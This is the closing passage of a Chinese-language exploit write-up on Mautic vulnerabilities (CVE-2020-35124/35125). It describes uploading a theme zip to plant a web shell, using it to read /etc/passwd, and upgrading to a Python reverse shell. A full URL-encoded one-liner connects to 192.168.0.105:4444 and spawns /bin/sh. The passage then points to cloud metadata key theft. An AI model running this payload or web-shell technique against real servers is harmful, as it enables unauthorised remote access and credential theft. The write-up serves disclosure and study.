接下来,上传主题zip文件:
启用该主题:
为了激活Web Shell,我们首先需要使用自定义Date字段创建一个表单,然后再对其进行编辑。Web Shell会在/s/forms/edit/<form_id>页面被激活。下图中,我们导出了Mautic服务器中/etc/passwd文件的内容:
我们还可以使用一个Python反向Shell来升级原Web Shell:
?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.0.105%22%2c4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27
总结
这个漏洞将允许攻击者做很多事情。云环境中的一个常见目标是枚举云元数据URL以窃取访问密钥。在混合云场景中,如果没有适当的网络分段控制,攻击者可能会进入受害者的内部网络。
参考资料https://github.com/mautic/mautic/security/advisories
https://www.mautic.org/blog/community/security-release-all-versions-mautic-prior-2-16-5-and-3-2-4
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35125